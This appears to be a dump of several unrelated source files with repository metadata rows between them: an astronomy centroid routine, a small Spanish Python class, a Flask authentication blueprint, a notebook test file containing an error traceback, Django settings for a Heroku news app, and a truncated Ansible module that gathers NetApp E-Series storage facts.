; (2) DAOPHOT now uses a newer algorithm (implemented in GCNTRD.PRO) in
; which centroids are determined by fitting 1-d Gaussians to the
; marginal distributions in the X and Y directions.
; (3) The default behavior of CNTRD changed in June 2004 (from EXTENDBOX=3
; to EXTENDBOX = 0).
; (4) Stone (1989, AJ, 97, 1227) concludes that the derivative search
; algorithm in CNTRD is not as effective (though faster) as a
; Gaussian fit (used in GCNTRD.PRO).
; MODIFICATION HISTORY:
; Written 2/25/86, by J. K. Hill, S.A.S.C., following
; algorithm used by P. Stetson in DAOPHOT.
; Allowed input vectors G. Hennessy April, 1992
; Fixed to prevent wrong answer if floating pt. X & Y supplied
; W. Landsman March, 1993
; Convert byte, integer subimages to float W. Landsman May 1995
; Converted to IDL V5.0 W. Landsman September 1997
; Better checking of edge of frame David Hogg October 2000
; Avoid integer wraparound for unsigned arrays W.Landsman January 2001
; Handle case where more than 1 pixel has maximum value W.L. July 2002
; Added /KEEPCENTER, EXTENDBOX (with default = 0) keywords WL June 2004
; Some errrors were returning X,Y = NaN rather than -1,-1 WL Aug 2010
;- """
sz_image = np.shape(img)
xsize = sz_image[1]
ysize = sz_image[0]
# dtype = sz_image[3] ;Datatype
# Compute size of box needed to compute centroid
if not extendbox: extendbox = 0
nhalf = int(0.637*fwhm)
if nhalf < 2: nhalf = 2
nbox = 2*nhalf+1 #Width of box to be used to compute centroid
nhalfbig = nhalf + extendbox
nbig = nbox + extendbox*2 #Extend box 3 pixels on each side to search for max pixel value
if type(x) == np.float or type(x) == np.int: npts = 1
else: npts = len(x)
if npts == 1: xcen = float(x) ; ycen = float(y)
else: xcen = x.astype(float) ; ycen = y.astype(float)
ix = np.round( x ) #Central X pixel ;Added 3/93
iy = np.round( y ) #Central Y pixel
if npts == 1: x,y,ix,iy,xcen,ycen = [x],[y],[ix],[iy],[xcen],[ycen]
for i in range(npts): #Loop over X,Y vector
pos = str(x[i]) + ' ' + str(y[i])
if not keepcenter:
if ( (ix[i] < nhalfbig) or ((ix[i] + nhalfbig) > xsize-1) or \
(iy[i] < nhalfbig) or ((iy[i] + nhalfbig) > ysize-1) ):
if not silent:
print('Position '+ pos + ' too near edge of image')
xcen[i] = -1 ; ycen[i] = -1
continue
bigbox = img[int(iy[i]-nhalfbig) : int(iy[i]+nhalfbig+1), int(ix[i]-nhalfbig) : int(ix[i]+nhalfbig+1)]
# Locate maximum pixel in 'NBIG' sized subimage
goodrow = np.where(bigbox == bigbox)
mx = np.max( bigbox[goodrow]) #Maximum pixel value in BIGBOX
mx_pos = np.where(bigbox.reshape(np.shape(bigbox)[0]*np.shape(bigbox)[1]) == mx)[0] #How many pixels have maximum value?
Nmax = len(mx_pos)
idx = mx_pos % nbig #X coordinate of Max pixel
idy = mx_pos / nbig #Y coordinate of Max pixel
if Nmax > 1: #More than 1 pixel at maximum?
idx = np.round(np.sum(idx)/Nmax)
idy = np.round(np.sum(idy)/Nmax)
else:
idx = idx[0]
idy = idy[0]
xmax = ix[i] - (nhalf+extendbox) + idx #X coordinate in original image array
ymax = iy[i] - (nhalf+extendbox) + idy #Y coordinate in original image array
else:
xmax = ix[i]
ymax = iy[i]
#; ---------------------------------------------------------------------
#; check *new* center location for range
#; added by Hogg
if ( (xmax < nhalf) or ((xmax + nhalf) > xsize-1) or \
(ymax < nhalf) or ((ymax + nhalf) > ysize-1) ):
if not silent:
print('Position '+ pos + ' moved too near edge of image')
xcen[i] = -1 ; ycen[i] = -1
continue
#; ---------------------------------------------------------------------
#
#; Extract smaller 'STRBOX' sized subimage centered on maximum pixel
strbox = img[int(ymax-nhalf) : int(ymax+nhalf+1), int(xmax-nhalf) : int(xmax+nhalf+1)]
# if (dtype NE 4) and (dtype NE 5) then strbox = float(strbox)
if debug:
print('Subarray used to compute centroid:')
print(strbox)
ir = (nhalf-1)
if ir < 1: ir = 1
dd = np.arange(nbox-1).astype(int) + 0.5 - nhalf
# Weighting factor W unity in center, 0.5 at end, and linear in between
w = 1. - 0.5*(np.abs(dd)-0.5)/(nhalf-0.5)
sumc = np.sum(w)
#; Find X centroid
deriv = np.roll(strbox,-1,axis=1) - strbox #;Shift in X & subtract to get derivative
deriv = deriv[nhalf-ir:nhalf+ir+1,0:nbox-1] #;Don't want edges of the array
deriv = np.sum( deriv, 0 ) # ;Sum X derivatives over Y direction
sumd = np.sum( w*deriv )
sumxd = np.sum( w*dd*deriv )
sumxsq = np.sum( w*dd**2 )
if sumxd >= 0: # ;Reject if X derivative not decreasing
if not silent:
print('Unable to compute X centroid around position '+ pos)
xcen[i]=-1 ; ycen[i]=-1
continue
dx = sumxsq*sumd/(sumc*sumxd)
if ( np.abs(dx) > nhalf ): #Reject if centroid outside box
if not silent:
print('Computed X centroid for position '+ pos + ' out of range')
xcen[i]=-1 ; ycen[i]=-1
continue
xcen[i] = xmax - dx #X centroid in original array
# Find Y Centroid
deriv = np.roll(strbox,-1,axis=0) - strbox #;Shift in X & subtract to get derivative
deriv = deriv[0:nbox-1,nhalf-ir:nhalf+ir+1]
deriv = np.sum( deriv,1 )
sumd = np.sum( w*deriv )
sumxd = np.sum( w*deriv*dd )
sumxsq = np.sum( w*dd**2 )
if (sumxd >= 0): #;Reject if Y derivative not decreasing
if not silent:
print('Unable to compute Y centroid around position '+ pos)
xcen[i] = -1 ; ycen[i] = -1
continue
dy = sumxsq*sumd/(sumc*sumxd)
if (np.abs(dy) > nhalf): #Reject if computed Y centroid outside box
if not silent:
print('Computed X centroid for position '+ pos + ' out of range')
xcen[i]=-1 ; ycen[i]=-1
continue
ycen[i] = ymax-dy
if npts == 1: xcen,ycen = xcen[0],ycen[0]
return(xcen,ycen)
| [
"steve.rodney@gmail.com"
] | steve.rodney@gmail.com |
758e384b3a6911b45061fc77173d87ce769d5074 | e8775c4c2df37b87cf1581d258310084d74b01f3 | /contribucion.py | ca163d5ae42d3cae74e0800d235ee7e5a232ae9b | [] | no_license | Gabospa/OOPexample | 1b547aed215cb73f1bf5c1fe2c8c1fcf54ac80d9 | 1c7d584a10623db593ee849a600d7ce430050f4d | refs/heads/master | 2022-11-25T04:48:51.325169 | 2020-07-31T16:18:13 | 2020-07-31T16:18:13 | 282,141,080 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,040 | py | class Contribucion:
""" Clase Contribución """
def __init__(self, idNum, titulo , idAutor , calificacion):
self._idNum = idNum
self._titulo = titulo
self._idAutor = idAutor
self._calificacion = calificacion
#id getter
@property
def idNum(self):
return self._idNum
#id setter
@idNum.setter
def set_id(self, idNum):
self._idNum = idNum
#titulo getter
@property
def titulo(self):
return self._titulo
#titulo setter
@titulo.setter
def set_titulo(self, titulo):
self._titulo = titulo
#calificación getter
@property
def calificacion(self):
return self._calificacion
#calificación setter
@titulo.setter
def set_calificacion(self, calificacion):
self._calificacion = calificacion
#actualizarAutor actualiza el autor de la contribucion de acuerdo al nuevo parametro idAutor
def actualizarAutor(self, nuevoAutor):
self._idAutor = nuevoAutor | [
"gabospa@gmail.com"
] | gabospa@gmail.com |
a4d8f83509a7a69fa49cef14a93d2cb7220dbe9d | 2c5de2a2748a4418800a0aceff2444e1c3a8d72d | /ilsp/common/auth.py | 25b29000eae9bd6138d713cc0af7ba4547c859d9 | [] | no_license | fmfi/infolist-editor | 9fbd60139e03c06ed465452faf8ff7b7c5e48f6d | 4aa613fac74e4648f2640f8a086e7953296d56fc | refs/heads/master | 2021-01-13T02:06:37.745620 | 2018-02-19T09:54:51 | 2018-02-19T09:54:51 | 13,423,385 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,198 | py | from functools import wraps
import os
from flask import Blueprint, request, redirect, Response, render_template, current_app, url_for, g, abort
from itsdangerous import URLSafeSerializer
blueprint = Blueprint('auth', __name__)
@blueprint.before_app_request
def before_request():
username = request.remote_user
if current_app.debug and 'REMOTE_USER' in os.environ:
username = os.environ['REMOTE_USER']
g.username = username
g.user = g.db.load_user(username)
def login_get_next_url():
if 'next' not in request.args:
return None, None
try:
serializer = URLSafeSerializer(current_app.secret_key)
goto_encrypted = request.args['next']
goto = serializer.loads(goto_encrypted)
goto = request.url_root + goto
return goto, goto_encrypted
except:
return None, None
@blueprint.route('/login')
def login():
url, encrypted = login_get_next_url()
if not url:
return redirect(url_for('index'))
return redirect(url)
@blueprint.route('/logout')
def logout():
logout_link = 'https://login.uniba.sk/logout.cgi?{}'.format(url_for('index', _external=True))
response = current_app.make_response(redirect(logout_link))
if 'COSIGN_SERVICE' in request.environ:
response.set_cookie(request.environ['COSIGN_SERVICE'], value='',
expires=1, path='/', secure=True)
return response
@blueprint.route('/ping')
def ping():
return ''
@blueprint.route('/ping.js')
def ping_js():
return Response(render_template('ping.js'), mimetype='text/javascript')
def restrict(api=False):
def decorator(f):
@wraps(f)
def wrapper(*args, **kwargs):
if not g.user:
if api:
abort(401)
else:
if g.username:
return render_template('unauthorized.html'), 401
goto = None
if request.method in ['HEAD', 'GET']:
if request.url.startswith(request.url_root):
goto = request.url[len(request.url_root):]
serializer = URLSafeSerializer(current_app.secret_key)
goto = serializer.dumps(goto)
return redirect(url_for('index', next=goto))
return f(*args, **kwargs)
return wrapper
return decorator | [
"martin.sucha@fmph.uniba.sk"
] | martin.sucha@fmph.uniba.sk |
0e20409c8fcd44abf8a545914efe38451ae3111a | 748133ddbca64674b0a1c3f3453f1abf1b3e8523 | /Biof309_project/modules/.ipynb_checkpoints/test_Clearnulls-checkpoint.py | 5224baf6fd465d560f9437a089b6f4149fcbae33 | [] | no_license | sarahfa-por/Biof309 | 2043a55a56117b5e68c62e730c074cb6b19479a6 | a586a6d6fd7142a8c93283dd1c406210d5ea0af1 | refs/heads/master | 2020-10-01T23:13:23.819511 | 2019-12-12T23:07:40 | 2019-12-12T23:07:40 | 227,643,832 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,064 | py | {
"cells": [
{
"cell_type": "code",
"execution_count": 10,
"metadata": {},
"outputs": [
{
"ename": "NameError",
"evalue": "name 'null' is not defined",
"output_type": "error",
"traceback": [
"\u001b[0;31m---------------------------------------------------------------------------\u001b[0m",
"\u001b[0;31mNameError\u001b[0m Traceback (most recent call last)",
"\u001b[0;32m<ipython-input-10-6aa3da78a74a>\u001b[0m in \u001b[0;36m<module>\u001b[0;34m\u001b[0m\n\u001b[1;32m 3\u001b[0m \u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 4\u001b[0m \u001b[0;32mimport\u001b[0m \u001b[0mpytest\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0;32m----> 5\u001b[0;31m \u001b[0;32mfrom\u001b[0m \u001b[0mmodules\u001b[0m \u001b[0;32mimport\u001b[0m \u001b[0mClearnulls\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m 6\u001b[0m \u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 7\u001b[0m \u001b[0;32mdef\u001b[0m \u001b[0mtest_for_nulls\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m:\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n",
"\u001b[0;32m~/Documents/VDJ_Analysis/modules/Clearnulls.py\u001b[0m in \u001b[0;36m<module>\u001b[0;34m\u001b[0m\n\u001b[1;32m 3\u001b[0m {\n\u001b[1;32m 4\u001b[0m \u001b[0;34m\"cell_type\"\u001b[0m\u001b[0;34m:\u001b[0m \u001b[0;34m\"code\"\u001b[0m\u001b[0;34m,\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0;32m----> 5\u001b[0;31m \u001b[0;34m\"execution_count\"\u001b[0m\u001b[0;34m:\u001b[0m \u001b[0mnull\u001b[0m\u001b[0;34m,\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m 6\u001b[0m \u001b[0;34m\"metadata\"\u001b[0m\u001b[0;34m:\u001b[0m \u001b[0;34m{\u001b[0m\u001b[0;34m}\u001b[0m\u001b[0;34m,\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 7\u001b[0m \u001b[0;34m\"outputs\"\u001b[0m\u001b[0;34m:\u001b[0m \u001b[0;34m[\u001b[0m\u001b[0;34m]\u001b[0m\u001b[0;34m,\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n",
"\u001b[0;31mNameError\u001b[0m: name 'null' is not defined"
]
}
],
"source": [
"import sys\n",
"sys.path.append('/Documents/VDJ_Analysis')\n",
"\n",
"import pytest\n",
"import Clearnulls\n",
"\n",
"def test_for_nulls():\n",
" assert Clearnulls(df, 'cdr3').isnull().all()\n"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.7.3"
}
},
"nbformat": 4,
"nbformat_minor": 4
}
| [
"sarah.andrews2@nih.gov"
] | sarah.andrews2@nih.gov |
d90b17e4a307a458615f340144ef6ae834bd9bd4 | 4dbf96a46d754e79d3e4893dbef036acab2c19a2 | /config/settings.py | d8fdd70facf0d49e07547534682cc46058548f38 | [] | no_license | noellehamberis/fullstack-newsapp | 0c2536698ca22ea91d30e5c31e08874de8c86b29 | 7d6769c5b100b39093ebff23c6fe4ed5dc35fc8a | refs/heads/main | 2023-01-04T11:53:24.555522 | 2020-10-30T20:41:49 | 2020-10-30T20:41:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,307 | py | """
Django settings for config project.
Generated by 'django-admin startproject' using Django 3.1.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
import os
import dj_database_url
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ['SECRET_KEY']
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = [
'127.0.0.1',
'immense-meadow-37404.herokuapp.com'
]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.sites',
'whitenoise.runserver_nostatic',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'rest_auth',
'allauth',
'allauth.account',
'allauth.socialaccount',
'news.apps.NewsConfig',
'frontend.apps.FrontendConfig'
]
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': [
#'rest_framework.permissions.AllowAny',
'rest_framework.permissions.IsAuthenticated',
],
'DEFAULT_AUTHENTICATION_CLASSES': [
'rest_framework.authentication.SessionAuthentication',
'rest_framework.authentication.TokenAuthentication',
]
}
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'config.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'config.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
if os.environ.get('DATABASE_URL'):
DATABASES = {
'default': dj_database_url.config(default=os.environ['DATABASE_URL'])
}
else:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
SITE_ID = 1
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
REACT_APP_DIR = os.path.join(BASE_DIR, 'frontend/static')
STATICFILES_DIRS = ( os.path.join(BASE_DIR, 'frontend/static/build/static'), )
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
| [
"noellehamberis@gmail.com"
] | noellehamberis@gmail.com |
b5d2e30fd0fca25810593302a2d6220183c9a7f6 | 26bd175ffb3bd204db5bcb70eec2e3dfd55fbe9f | /exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/netapp_e_facts.py | 3be087a3abae3dc321f1d89f31e54067f0ed841f | [
"MIT",
"GPL-3.0-only",
"GPL-3.0-or-later",
"CC0-1.0",
"GPL-1.0-or-later"
] | permissive | tr3ck3r/linklight | 37814ed19173d893cdff161355d70a1cf538239b | 5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7 | refs/heads/master | 2021-04-11T04:33:02.727318 | 2020-03-25T17:38:41 | 2020-03-25T17:38:41 | 248,992,437 | 0 | 0 | MIT | 2020-03-21T14:26:25 | 2020-03-21T14:26:25 | null | UTF-8 | Python | false | false | 27,071 | py | #!/usr/bin/python
# (c) 2016, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
module: netapp_e_facts
short_description: NetApp E-Series retrieve facts about NetApp E-Series storage arrays
description:
- The netapp_e_facts module returns a collection of facts regarding NetApp E-Series storage arrays.
author:
- Kevin Hulquest (@hulquest)
- Nathan Swartz (@ndswartz)
extends_documentation_fragment:
- netapp.ontap.netapp.eseries
'''
EXAMPLES = """
---
- name: Get array facts
netapp_e_facts:
ssid: "1"
api_url: "https://192.168.1.100:8443/devmgr/v2"
api_username: "admin"
api_password: "adminpass"
validate_certs: true
"""
RETURN = """
msg:
description: Success message
returned: on success
type: str
sample:
- Gathered facts for storage array. Array ID [1].
- Gathered facts for web services proxy.
storage_array_facts:
description: provides details about the array, controllers, management interfaces, hostside interfaces,
driveside interfaces, disks, storage pools, volumes, snapshots, and features.
returned: on successful inquiry from from embedded web services rest api
type: complex
contains:
netapp_controllers:
description: storage array controller list that contains basic controller identification and status
type: complex
sample:
- [{"name": "A", "serial": "021632007299", "status": "optimal"},
{"name": "B", "serial": "021632007300", "status": "failed"}]
netapp_disks:
description: drive list that contains identification, type, and status information for each drive
type: complex
sample:
- [{"available": false,
"firmware_version": "MS02",
"id": "01000000500003960C8B67880000000000000000",
"media_type": "ssd",
"product_id": "PX02SMU080 ",
"serial_number": "15R0A08LT2BA",
"status": "optimal",
"tray_ref": "0E00000000000000000000000000000000000000",
"usable_bytes": "799629205504" }]
netapp_driveside_interfaces:
description: drive side interface list that contains identification, type, and speed for each interface
type: complex
sample:
- [{ "controller": "A", "interface_speed": "12g", "interface_type": "sas" }]
- [{ "controller": "B", "interface_speed": "10g", "interface_type": "iscsi" }]
netapp_enabled_features:
description: specifies the enabled features on the storage array.
returned: on success
type: complex
sample:
- [ "flashReadCache", "performanceTier", "protectionInformation", "secureVolume" ]
netapp_host_groups:
description: specifies the host groups on the storage arrays.
returned: on success
type: complex
sample:
- [{ "id": "85000000600A098000A4B28D003610705C40B964", "name": "group1" }]
netapp_hosts:
description: specifies the hosts on the storage arrays.
returned: on success
type: complex
sample:
- [{ "id": "8203800000000000000000000000000000000000",
"name": "host1",
"group_id": "85000000600A098000A4B28D003610705C40B964",
"host_type_index": 28,
"ports": [{ "type": "fc", "address": "1000FF7CFFFFFF01", "label": "FC_1" },
{ "type": "fc", "address": "1000FF7CFFFFFF00", "label": "FC_2" }]}]
netapp_host_types:
description: lists the available host types on the storage array.
returned: on success
type: complex
sample:
- [{ "index": 0, "type": "FactoryDefault" },
{ "index": 1, "type": "W2KNETNCL"},
{ "index": 2, "type": "SOL" },
{ "index": 5, "type": "AVT_4M" },
{ "index": 6, "type": "LNX" },
{ "index": 7, "type": "LnxALUA" },
{ "index": 8, "type": "W2KNETCL" },
{ "index": 9, "type": "AIX MPIO" },
{ "index": 10, "type": "VmwTPGSALUA" },
{ "index": 15, "type": "HPXTPGS" },
{ "index": 17, "type": "SolTPGSALUA" },
{ "index": 18, "type": "SVC" },
{ "index": 22, "type": "MacTPGSALUA" },
{ "index": 23, "type": "WinTPGSALUA" },
{ "index": 24, "type": "LnxTPGSALUA" },
{ "index": 25, "type": "LnxTPGSALUA_PM" },
{ "index": 26, "type": "ONTAP_ALUA" },
{ "index": 27, "type": "LnxTPGSALUA_SF" },
{ "index": 28, "type": "LnxDHALUA" },
{ "index": 29, "type": "ATTOClusterAllOS" }]
netapp_hostside_interfaces:
description: host side interface list that contains identification, configuration, type, speed, and
status information for each interface
type: complex
sample:
- [{"iscsi":
[{ "controller": "A",
"current_interface_speed": "10g",
"ipv4_address": "10.10.10.1",
"ipv4_enabled": true,
"ipv4_gateway": "10.10.10.1",
"ipv4_subnet_mask": "255.255.255.0",
"ipv6_enabled": false,
"iqn": "iqn.1996-03.com.netapp:2806.600a098000a81b6d0000000059d60c76",
"link_status": "up",
"mtu": 9000,
"supported_interface_speeds": [ "10g" ] }]}]
netapp_management_interfaces:
description: management interface list that contains identification, configuration, and status for
each interface
type: complex
sample:
- [{"alias": "ict-2800-A",
"channel": 1,
"controller": "A",
"dns_config_method": "dhcp",
"dns_servers": [],
"ipv4_address": "10.1.1.1",
"ipv4_address_config_method": "static",
"ipv4_enabled": true,
"ipv4_gateway": "10.113.1.1",
"ipv4_subnet_mask": "255.255.255.0",
"ipv6_enabled": false,
"link_status": "up",
"mac_address": "00A098A81B5D",
"name": "wan0",
"ntp_config_method": "disabled",
"ntp_servers": [],
"remote_ssh_access": false }]
netapp_storage_array:
description: provides storage array identification, firmware version, and available capabilities
type: dict
sample:
- {"chassis_serial": "021540006043",
"firmware": "08.40.00.01",
"name": "ict-2800-11_40",
"wwn": "600A098000A81B5D0000000059D60C76",
"cacheBlockSizes": [4096,
8192,
16384,
32768],
"supportedSegSizes": [8192,
16384,
32768,
65536,
131072,
262144,
524288]}
netapp_storage_pools:
description: storage pool list that contains identification and capacity information for each pool
type: complex
sample:
- [{"available_capacity": "3490353782784",
"id": "04000000600A098000A81B5D000002B45A953A61",
"name": "Raid6",
"total_capacity": "5399466745856",
"used_capacity": "1909112963072" }]
netapp_volumes:
description: storage volume list that contains identification and capacity information for each volume
type: complex
sample:
- [{"capacity": "5368709120",
"id": "02000000600A098000AAC0C3000002C45A952BAA",
"is_thin_provisioned": false,
"name": "5G",
"parent_storage_pool_id": "04000000600A098000A81B5D000002B45A953A61" }]
netapp_workload_tags:
description: workload tag list
type: complex
sample:
- [{"id": "87e19568-43fb-4d8d-99ea-2811daaa2b38",
"name": "ftp_server",
"workloadAttributes": [{"key": "use",
"value": "general"}]}]
netapp_volumes_by_initiators:
description: list of available volumes keyed by the mapped initiators.
type: complex
sample:
- {"192_168_1_1": [{"id": "02000000600A098000A4B9D1000015FD5C8F7F9E",
"meta_data": {"filetype": "xfs", "public": true},
"name": "some_volume",
"workload_name": "test2_volumes",
"wwn": "600A098000A4B9D1000015FD5C8F7F9E"}]}
snapshot_images:
description: snapshot image list that contains identification, capacity, and status information for each
snapshot image
type: complex
sample:
- [{"active_cow": true,
"creation_method": "user",
"id": "34000000600A098000A81B5D00630A965B0535AC",
"pit_capacity": "5368709120",
"reposity_cap_utilization": "0",
"rollback_source": false,
"status": "optimal" }]
"""
from re import match
from pprint import pformat
from ansible_collections.netapp.ontap.plugins.module_utils.netapp import NetAppESeriesModule
class Facts(NetAppESeriesModule):
def __init__(self):
web_services_version = "02.00.0000.0000"
super(Facts, self).__init__(ansible_options={},
web_services_version=web_services_version,
supports_check_mode=True)
def get_controllers(self):
"""Retrieve a mapping of controller references to their labels."""
controllers = list()
try:
rc, controllers = self.request('storage-systems/%s/graph/xpath-filter?query=/controller/id' % self.ssid)
except Exception as err:
self.module.fail_json(
msg="Failed to retrieve controller list! Array Id [%s]. Error [%s]."
% (self.ssid, str(err)))
controllers.sort()
controllers_dict = {}
i = ord('A')
for controller in controllers:
label = chr(i)
controllers_dict[controller] = label
i += 1
return controllers_dict
def get_array_facts(self):
"""Extract particular facts from the storage array graph"""
facts = dict(facts_from_proxy=(not self.is_embedded()), ssid=self.ssid)
controller_reference_label = self.get_controllers()
array_facts = None
# Get the storage array graph
try:
rc, array_facts = self.request("storage-systems/%s/graph" % self.ssid)
except Exception as error:
self.module.fail_json(msg="Failed to obtain facts from storage array with id [%s]. Error [%s]" % (self.ssid, str(error)))
facts['netapp_storage_array'] = dict(
name=array_facts['sa']['saData']['storageArrayLabel'],
chassis_serial=array_facts['sa']['saData']['chassisSerialNumber'],
firmware=array_facts['sa']['saData']['fwVersion'],
wwn=array_facts['sa']['saData']['saId']['worldWideName'],
segment_sizes=array_facts['sa']['featureParameters']['supportedSegSizes'],
cache_block_sizes=array_facts['sa']['featureParameters']['cacheBlockSizes'])
facts['netapp_controllers'] = [
dict(
name=controller_reference_label[controller['controllerRef']],
serial=controller['serialNumber'].strip(),
status=controller['status'],
) for controller in array_facts['controller']]
facts['netapp_host_groups'] = [
dict(
id=group['id'],
name=group['name']
) for group in array_facts['storagePoolBundle']['cluster']]
facts['netapp_hosts'] = [
dict(
group_id=host['clusterRef'],
hosts_reference=host['hostRef'],
id=host['id'],
name=host['name'],
host_type_index=host['hostTypeIndex'],
posts=host['hostSidePorts']
) for host in array_facts['storagePoolBundle']['host']]
facts['netapp_host_types'] = [
dict(
type=host_type['hostType'],
index=host_type['index']
) for host_type in array_facts['sa']['hostSpecificVals']
if 'hostType' in host_type.keys() and host_type['hostType']
# This conditional ignores zero-length strings which indicates that the associated host-specific NVSRAM region has been cleared.
]
facts['snapshot_images'] = [
dict(
id=snapshot['id'],
status=snapshot['status'],
pit_capacity=snapshot['pitCapacity'],
creation_method=snapshot['creationMethod'],
reposity_cap_utilization=snapshot['repositoryCapacityUtilization'],
active_cow=snapshot['activeCOW'],
rollback_source=snapshot['isRollbackSource']
) for snapshot in array_facts['highLevelVolBundle']['pit']]
facts['netapp_disks'] = [
dict(
id=disk['id'],
available=disk['available'],
media_type=disk['driveMediaType'],
status=disk['status'],
usable_bytes=disk['usableCapacity'],
tray_ref=disk['physicalLocation']['trayRef'],
product_id=disk['productID'],
firmware_version=disk['firmwareVersion'],
serial_number=disk['serialNumber'].lstrip()
) for disk in array_facts['drive']]
facts['netapp_management_interfaces'] = [
dict(controller=controller_reference_label[controller['controllerRef']],
name=iface['ethernet']['interfaceName'],
alias=iface['ethernet']['alias'],
channel=iface['ethernet']['channel'],
mac_address=iface['ethernet']['macAddr'],
remote_ssh_access=iface['ethernet']['rloginEnabled'],
link_status=iface['ethernet']['linkStatus'],
ipv4_enabled=iface['ethernet']['ipv4Enabled'],
ipv4_address_config_method=iface['ethernet']['ipv4AddressConfigMethod'].lower().replace("config", ""),
ipv4_address=iface['ethernet']['ipv4Address'],
ipv4_subnet_mask=iface['ethernet']['ipv4SubnetMask'],
ipv4_gateway=iface['ethernet']['ipv4GatewayAddress'],
ipv6_enabled=iface['ethernet']['ipv6Enabled'],
dns_config_method=iface['ethernet']['dnsProperties']['acquisitionProperties']['dnsAcquisitionType'],
dns_servers=(iface['ethernet']['dnsProperties']['acquisitionProperties']['dnsServers']
if iface['ethernet']['dnsProperties']['acquisitionProperties']['dnsServers'] else []),
ntp_config_method=iface['ethernet']['ntpProperties']['acquisitionProperties']['ntpAcquisitionType'],
ntp_servers=(iface['ethernet']['ntpProperties']['acquisitionProperties']['ntpServers']
if iface['ethernet']['ntpProperties']['acquisitionProperties']['ntpServers'] else [])
) for controller in array_facts['controller'] for iface in controller['netInterfaces']]
facts['netapp_hostside_interfaces'] = [
dict(
fc=[dict(controller=controller_reference_label[controller['controllerRef']],
channel=iface['fibre']['channel'],
link_status=iface['fibre']['linkStatus'],
current_interface_speed=strip_interface_speed(iface['fibre']['currentInterfaceSpeed']),
maximum_interface_speed=strip_interface_speed(iface['fibre']['maximumInterfaceSpeed']))
for controller in array_facts['controller']
for iface in controller['hostInterfaces']
if iface['interfaceType'] == 'fc'],
ib=[dict(controller=controller_reference_label[controller['controllerRef']],
channel=iface['ib']['channel'],
